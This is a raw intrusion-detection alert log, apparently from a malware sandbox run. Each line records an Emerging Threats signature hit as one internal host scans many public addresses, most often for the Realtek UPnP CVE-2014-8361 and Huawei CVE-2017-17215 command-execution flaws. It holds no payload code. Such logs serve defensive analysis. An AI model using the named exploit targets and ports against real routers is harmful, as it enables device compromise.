                                                07/20/24-23:05:39.898156TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614616652869192.168.2.14183.13.10.198
                                                07/20/24-23:05:39.678174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469437215192.168.2.14157.122.105.116
                                                07/20/24-23:06:27.119874TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4353652869192.168.2.14203.100.47.239
                                                07/20/24-23:05:37.489725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3638852869192.168.2.1438.130.134.142
                                                07/20/24-23:06:02.378063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3758052869192.168.2.1434.212.103.117
                                                07/20/24-23:06:06.855214TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23401052869192.168.2.1436.129.152.48
                                                07/20/24-23:06:00.164884TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614418652869192.168.2.1473.67.230.39
                                                07/20/24-23:05:40.478948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4236852869192.168.2.1467.132.246.110
                                                07/20/24-23:05:45.437584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5143437215192.168.2.14197.21.76.109
                                                07/20/24-23:05:56.772131TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614013452869192.168.2.14179.58.179.48
                                                07/20/24-23:05:59.404140TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613482452869192.168.2.1477.177.17.23
                                                07/20/24-23:05:59.330840TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616085452869192.168.2.14117.29.110.218
                                                07/20/24-23:06:02.733116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4987652869192.168.2.1484.65.76.178
                                                07/20/24-23:07:07.975226TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615022852869192.168.2.1439.21.244.103
                                                07/20/24-23:05:35.203581TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3304452869192.168.2.14157.223.126.25
                                                07/20/24-23:05:57.432998TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5584052869192.168.2.14145.10.65.112
                                                07/20/24-23:06:03.064635TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614860052869192.168.2.14161.200.183.56
                                                07/20/24-23:05:52.575727TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23332852869192.168.2.14151.208.74.251
                                                07/20/24-23:05:59.472881TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615646852869192.168.2.1477.65.43.181
                                                07/20/24-23:06:04.266985TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613442252869192.168.2.1450.230.108.60
                                                07/20/24-23:05:59.239089TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5055052869192.168.2.14151.20.36.90
                                                07/20/24-23:06:01.572805TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613463252869192.168.2.1446.67.182.106
                                                07/20/24-23:05:39.678174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5700037215192.168.2.1467.103.255.211
                                                07/20/24-23:05:57.334876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3340652869192.168.2.1443.249.97.34
                                                07/20/24-23:05:46.740972TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616077452869192.168.2.1486.103.97.76
                                                07/20/24-23:05:52.544570TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24097252869192.168.2.14155.93.230.5
                                                07/20/24-23:06:00.954677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3592252869192.168.2.14199.208.79.51
                                                07/20/24-23:06:02.272030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6024252869192.168.2.1452.18.183.9
                                                07/20/24-23:05:40.344189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25697652869192.168.2.14100.187.132.120
                                                07/20/24-23:06:35.012567TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614808052869192.168.2.1484.37.71.97
                                                07/20/24-23:05:56.402085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3701437215192.168.2.1441.100.174.46
                                                07/20/24-23:06:03.131821TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5796052869192.168.2.149.221.216.212
                                                07/20/24-23:06:01.224583TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23379652869192.168.2.14151.106.207.115
                                                07/20/24-23:06:03.235312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5912852869192.168.2.14148.2.55.117
                                                07/20/24-23:06:09.714968TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615614252869192.168.2.1466.198.124.244
                                                07/20/24-23:05:34.653253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3950637215192.168.2.14157.51.200.31
                                                07/20/24-23:06:00.171719TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25521652869192.168.2.14109.93.236.93
                                                07/20/24-23:07:03.190387TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3454252869192.168.2.14126.248.230.246
                                                07/20/24-23:06:03.345103TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4509652869192.168.2.14143.103.141.123
                                                07/20/24-23:05:45.439166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676237215192.168.2.14157.103.103.96
                                                07/20/24-23:05:52.445659TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23739252869192.168.2.14167.216.237.21
                                                07/20/24-23:06:16.383377TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4925652869192.168.2.14196.158.220.11
                                                07/20/24-23:05:36.374095TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614706252869192.168.2.141.146.229.84
                                                07/20/24-23:05:37.464931TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25256452869192.168.2.1436.216.251.126
                                                07/20/24-23:05:59.257734TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4187852869192.168.2.14122.54.20.32
                                                07/20/24-23:05:57.233976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3763252869192.168.2.1462.106.120.156
                                                07/20/24-23:06:32.673677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615006652869192.168.2.14169.76.8.231
                                                07/20/24-23:05:56.825307TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614669452869192.168.2.1498.81.150.61
                                                07/20/24-23:05:42.245741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4050837215192.168.2.14157.223.29.42
                                                07/20/24-23:05:35.355292TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4050652869192.168.2.1495.188.72.113
                                                07/20/24-23:06:15.999787TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23403452869192.168.2.14150.121.79.74
                                                07/20/24-23:05:52.513067TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25462052869192.168.2.14219.160.20.3
                                                07/20/24-23:05:50.533759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266237215192.168.2.14126.14.33.154
                                                07/20/24-23:07:02.684157TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5210452869192.168.2.1469.183.175.186
                                                07/20/24-23:05:58.087911TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615873852869192.168.2.14140.29.146.170
                                                07/20/24-23:06:02.997059TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3906452869192.168.2.14217.234.142.206
                                                07/20/24-23:07:11.472742TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23522652869192.168.2.14119.180.143.176
                                                07/20/24-23:05:58.084343TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615024652869192.168.2.1417.97.170.109
                                                07/20/24-23:05:45.392754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4651037215192.168.2.1441.218.148.135
                                                07/20/24-23:05:48.762153TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3432837215192.168.2.1481.128.24.198
                                                07/20/24-23:05:52.570834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5057452869192.168.2.14176.247.246.75
                                                07/20/24-23:05:58.253105TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3983852869192.168.2.1467.42.219.248
                                                07/20/24-23:05:52.570834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24269852869192.168.2.1486.169.138.209
                                                07/20/24-23:05:52.628611TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24322052869192.168.2.14137.223.238.217
                                                07/20/24-23:05:36.354373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786437215192.168.2.1441.112.8.124
                                                07/20/24-23:06:47.739427TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25346652869192.168.2.1480.122.195.116
                                                07/20/24-23:05:36.590112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699837215192.168.2.14178.163.147.89
                                                07/20/24-23:05:48.090130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3766252869192.168.2.14203.201.159.16
                                                07/20/24-23:06:10.376181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5686852869192.168.2.14124.231.89.13
                                                07/20/24-23:05:39.677505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5366437215192.168.2.1441.37.37.234
                                                07/20/24-23:05:57.804757TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4282452869192.168.2.14105.53.110.200
                                                07/20/24-23:05:39.938284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613809652869192.168.2.1451.81.161.20
                                                07/20/24-23:06:01.940214TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6085252869192.168.2.14161.14.214.31
                                                07/20/24-23:06:11.138961TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24356052869192.168.2.14179.227.5.10
                                                07/20/24-23:06:02.104627TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4542852869192.168.2.148.245.4.123
                                                07/20/24-23:06:00.620754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297637215192.168.2.14197.88.244.51
                                                07/20/24-23:05:59.316014TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26005052869192.168.2.1450.39.27.83
                                                07/20/24-23:05:35.220141TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615588852869192.168.2.1462.5.163.114
                                                07/20/24-23:05:50.479091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3703637215192.168.2.1441.219.58.56
                                                07/20/24-23:05:37.520621TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24778452869192.168.2.14216.11.155.229
                                                07/20/24-23:05:38.204956TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4570452869192.168.2.1432.192.109.254
                                                07/20/24-23:05:58.747598TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5065052869192.168.2.144.132.146.66
                                                07/20/24-23:06:24.686159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4670252869192.168.2.1435.5.176.100
                                                07/20/24-23:05:36.328639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5769437215192.168.2.1441.17.25.124
                                                07/20/24-23:05:38.945198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5691037215192.168.2.14157.96.111.59
                                                07/20/24-23:05:36.343227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5518837215192.168.2.1441.55.60.37
                                                07/20/24-23:05:45.392755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184037215192.168.2.1441.103.13.254
                                                07/20/24-23:05:36.325773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912037215192.168.2.14197.186.233.14
                                                07/20/24-23:05:33.863090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5930637215192.168.2.14157.155.124.136
                                                07/20/24-23:05:35.467111TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613279652869192.168.2.1459.35.79.156
                                                07/20/24-23:06:27.335940TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613585452869192.168.2.1496.174.128.242
                                                07/20/24-23:05:56.079797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660037215192.168.2.1446.243.83.236
                                                07/20/24-23:05:59.374360TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3455052869192.168.2.14220.66.34.165
                                                07/20/24-23:06:16.602976TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614643052869192.168.2.1419.150.44.143
                                                07/20/24-23:05:37.527690TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3425852869192.168.2.14205.8.145.6
                                                07/20/24-23:05:36.324524TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618837215192.168.2.14197.248.32.116
                                                07/20/24-23:05:40.455250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4249252869192.168.2.14179.191.229.197
                                                07/20/24-23:05:56.402930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5044437215192.168.2.14197.158.86.187
                                                07/20/24-23:07:15.422064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5227052869192.168.2.14122.235.119.72
                                                07/20/24-23:05:35.260516TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613761052869192.168.2.1475.120.116.239
                                                07/20/24-23:05:37.442743TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4250852869192.168.2.1445.129.181.164
                                                07/20/24-23:05:58.900558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3522052869192.168.2.1464.247.1.200
                                                07/20/24-23:06:01.785367TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24810052869192.168.2.1478.101.209.190
                                                07/20/24-23:05:45.403074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4474437215192.168.2.1489.73.219.229
                                                07/20/24-23:05:52.589589TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24869452869192.168.2.14191.236.154.50
                                                07/20/24-23:05:35.369631TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614683652869192.168.2.14216.17.47.144
                                                07/20/24-23:05:57.934535TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5592452869192.168.2.14206.48.160.223
                                                07/20/24-23:06:02.998297TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3989652869192.168.2.14155.40.210.136
                                                07/20/24-23:05:56.812610TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614338052869192.168.2.14178.83.23.44
                                                07/20/24-23:05:35.971073TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4690252869192.168.2.14114.248.35.135
                                                07/20/24-23:05:52.494675TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5392652869192.168.2.14146.2.42.140
                                                07/20/24-23:05:42.127943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4086037215192.168.2.14197.1.83.86
                                                07/20/24-23:06:02.517784TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614847052869192.168.2.1467.83.53.203
                                                07/20/24-23:06:11.469684TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613990652869192.168.2.1471.171.254.193
                                                07/20/24-23:05:39.170455TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5629252869192.168.2.1424.106.113.180
                                                07/20/24-23:06:09.697115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5243452869192.168.2.1454.13.93.146
                                                07/20/24-23:06:27.523045TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5024652869192.168.2.14183.64.137.92
                                                07/20/24-23:05:59.171818TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4271852869192.168.2.1453.70.52.187
                                                07/20/24-23:05:39.630378TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614718852869192.168.2.14216.209.232.62
                                                07/20/24-23:05:52.514709TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25886852869192.168.2.14132.1.16.35
                                                07/20/24-23:06:33.055161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614156052869192.168.2.14147.154.255.30
                                                07/20/24-23:05:48.211869TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615397052869192.168.2.14160.215.105.255
                                                07/20/24-23:06:01.963469TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614015852869192.168.2.14184.42.36.239
                                                07/20/24-23:06:03.231512TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4371452869192.168.2.14172.186.38.12
                                                07/20/24-23:06:04.936056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3427852869192.168.2.1412.78.58.71
                                                07/20/24-23:06:12.981585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3640252869192.168.2.1436.252.191.148
                                                07/20/24-23:05:37.465013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23473052869192.168.2.14210.141.252.193
                                                07/20/24-23:05:42.237871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3580037215192.168.2.1441.189.225.89
                                                07/20/24-23:06:08.182697TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614749052869192.168.2.14122.13.119.12
                                                07/20/24-23:05:45.988990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761037215192.168.2.14197.191.67.100
                                                07/20/24-23:05:58.356121TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3748452869192.168.2.14210.180.35.0
                                                07/20/24-23:06:20.681117TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5946852869192.168.2.1441.9.240.173
                                                07/20/24-23:05:36.526908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3922437215192.168.2.14155.169.229.88
                                                07/20/24-23:07:08.369781TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23454852869192.168.2.14113.35.97.192
                                                07/20/24-23:05:59.136809TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24058052869192.168.2.1438.235.221.67
                                                07/20/24-23:05:39.902488TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5558452869192.168.2.14115.80.228.184
                                                07/20/24-23:05:36.287798TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615383652869192.168.2.14115.97.137.57
                                                07/20/24-23:05:34.622609TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092837215192.168.2.1475.163.132.69
                                                07/20/24-23:05:37.462432TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5313452869192.168.2.14212.202.97.136
                                                07/20/24-23:06:05.846150TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5486652869192.168.2.1450.125.157.33
                                                07/20/24-23:05:46.881517TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5089052869192.168.2.14213.79.125.242
                                                07/20/24-23:06:01.433779TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616001052869192.168.2.1481.215.136.101
                                                07/20/24-23:05:38.117397TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4167052869192.168.2.1492.201.144.62
                                                07/20/24-23:05:57.238429TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613358252869192.168.2.14211.48.36.13
                                                07/20/24-23:06:05.685689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3360252869192.168.2.1478.18.150.141
                                                07/20/24-23:05:34.644841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166837215192.168.2.14157.28.53.140
                                                07/20/24-23:05:36.325662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290237215192.168.2.14157.246.21.11
                                                07/20/24-23:05:38.002176TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615069452869192.168.2.14204.164.229.194
                                                07/20/24-23:05:36.426127TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616061652869192.168.2.14164.159.1.86
                                                07/20/24-23:06:21.074396TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613769852869192.168.2.14111.174.133.174
                                                07/20/24-23:06:35.375826TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5908052869192.168.2.14170.69.211.217
                                                07/20/24-23:05:59.119988TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615524852869192.168.2.144.91.9.190
                                                07/20/24-23:05:59.429308TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25922652869192.168.2.14184.148.136.22
                                                07/20/24-23:05:57.166360TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615630652869192.168.2.14103.108.73.218
                                                07/20/24-23:05:39.910306TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5848252869192.168.2.1442.188.126.193
                                                07/20/24-23:05:37.441223TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5738452869192.168.2.14159.94.41.117
                                                07/20/24-23:05:42.143657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5649237215192.168.2.1441.217.72.248
                                                07/20/24-23:05:34.644841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423237215192.168.2.1441.219.3.184
                                                07/20/24-23:05:56.086216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4814837215192.168.2.14197.123.204.246
                                                07/20/24-23:05:38.497508TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613867652869192.168.2.14153.214.17.177
                                                07/20/24-23:06:24.662240TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615433252869192.168.2.14156.136.74.107
                                                07/20/24-23:05:37.462705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6093652869192.168.2.14175.166.165.48
                                                07/20/24-23:05:40.325933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5800252869192.168.2.1447.26.143.30
                                                07/20/24-23:06:01.535181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614331652869192.168.2.14175.131.12.125
                                                07/20/24-23:05:38.441411TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3902252869192.168.2.14106.241.87.67
                                                07/20/24-23:05:39.351353TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4387252869192.168.2.14110.4.207.154
                                                07/20/24-23:05:57.797833TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616027252869192.168.2.14174.109.92.117
                                                07/20/24-23:06:02.920702TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3797252869192.168.2.14189.235.177.109
                                                07/20/24-23:06:01.650758TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24113652869192.168.2.1413.146.163.137
                                                07/20/24-23:06:09.587283TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5773052869192.168.2.14206.252.90.242
                                                07/20/24-23:05:56.888787TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5053052869192.168.2.14136.62.141.53
                                                07/20/24-23:06:02.165979TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5831852869192.168.2.14123.96.193.240
                                                07/20/24-23:05:34.664378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4930237215192.168.2.14197.1.71.210
                                                07/20/24-23:06:08.447627TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24959052869192.168.2.1443.139.32.29
                                                07/20/24-23:06:29.771660TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615177252869192.168.2.14134.155.249.12
                                                07/20/24-23:05:40.465472TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3799852869192.168.2.14204.228.34.103
